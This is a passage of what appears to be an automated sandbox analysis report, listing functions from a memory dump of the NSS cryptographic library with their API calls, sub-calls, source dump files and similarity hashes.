                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3425318038-0
                                                                                                                                                                                                                                                      • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                      • Instruction ID: 4249a386122c0e3bff33582ebc2076fae071e19c48697e2a3ba946ac015d321d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90416DB4501606AFE740EF55D860F92BBA1BF55359F158128D8188BFA1EB73F834CB90
                                                                                                                                                                                                                                                      Function 6C49DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C49DDEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6C49DE70
                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C49DE83
                                                                                                                                                                                                                                                      • HASH_ResultLenByOidTag.NSS3(?), ref: 6C49DE95
                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C49DEAE
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49DEBB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DECC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1091488953-0
                                                                                                                                                                                                                                                      • Opcode ID: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                                                      • Instruction ID: d30511af52402c2ea8b1f9a1e1ab657b394bc275dab328c84ce2a1ced914b554
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31B7B29006246BEF00EF69AD41FBB7BA89F54609F050139ED09A7751FB31D91486E2
                                                                                                                                                                                                                                                      Function 6C477E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C477E48
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C477E5B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477E7B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59925C,?), ref: 6C477E92
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477EA1
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477ED1
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477EFA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3989529743-0
                                                                                                                                                                                                                                                      • Opcode ID: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                                                      • Instruction ID: 677cfb5c98120e0505d8e5d4d079466cc86887269ab1090d0703ff0481d9a10a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4318FB2E052119BEB21DA659D40FAB77A8EF44259F564828DD19EBB01E720FC04C7F1
                                                                                                                                                                                                                                                      Function 6C4CDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC30
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC4E
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC5A
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4CDC7E
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CDCAD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2632744278-0
                                                                                                                                                                                                                                                      • Opcode ID: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                                                      • Instruction ID: 4ada438c8fb228685ece9323e89370b2de5b82c67103bebddc217d7e74ba9a64
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD318DB9A402009FE710DF59DC84E96B7F8AF04358F148029E949CBB10E7B1E944CBA2
                                                                                                                                                                                                                                                      Function 6C492E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C48E728,?,00000038,?,?,00000000), ref: 6C492E52
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E66
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E7B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C492E8F
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C492E9E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492EAB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492F0D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3106257965-0
                                                                                                                                                                                                                                                      • Opcode ID: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                                                      • Instruction ID: bc05a042e1911b5117ee8dd2577e6361dbec1dc7ab1f5d16e0594a5ffe435b35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5631F479A00515ABEB01EF28DC84C6ABB78FF56259B458178ED0887B11EB31ED64C7E0
                                                                                                                                                                                                                                                      Function 6C4B1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1ECB
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1EF1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B1F01
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1F39
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BFE20: TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B1F67
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                                                      • String ID: S&Kl
                                                                                                                                                                                                                                                      • API String ID: 704537481-2478177983
                                                                                                                                                                                                                                                      • Opcode ID: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                                                      • Instruction ID: 7fbdf13bd2eff6ae8f22998a0cb4cfd9092c546150f6028bdcc372b9a53b902f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75210175A04204ABEB00EF29DC44F9A3769AF85369F194128FD08ABB01E730E954C6F0
                                                                                                                                                                                                                                                      Function 6C4DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4291907967-0
                                                                                                                                                                                                                                                      • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                      • Instruction ID: a9b4ad21d98da494e41a0d4d2ea41cddc45b89b5bfbeb302f5d4d6e56ea57f08
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11A8A5F0120457E700FAA66C61FABB6EC9F5455EF05413DEC09D7B81FB60E90886F2
                                                                                                                                                                                                                                                      Function 6C488C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C488C1B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C488C34
                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3 ref: 6C488C65
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C488C9C
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C488CB6
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                      • String ID: KRAM
                                                                                                                                                                                                                                                      • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                      • Opcode ID: 2c1f0860af7e08271702e924886164c6efd6674387086cd506fe30ed26fa3fbf
                                                                                                                                                                                                                                                      • Instruction ID: da645e242d98a676da10d98a19870e2aa53b5aab6d62a87e2a5bd8d1a81003b7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1f0860af7e08271702e924886164c6efd6674387086cd506fe30ed26fa3fbf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0216DB1A06A018FD700EF78C484D59BBF4BF45308B06896ED8888B705DB31E886CBC1
                                                                                                                                                                                                                                                      Function 6C498E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EC3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EDC
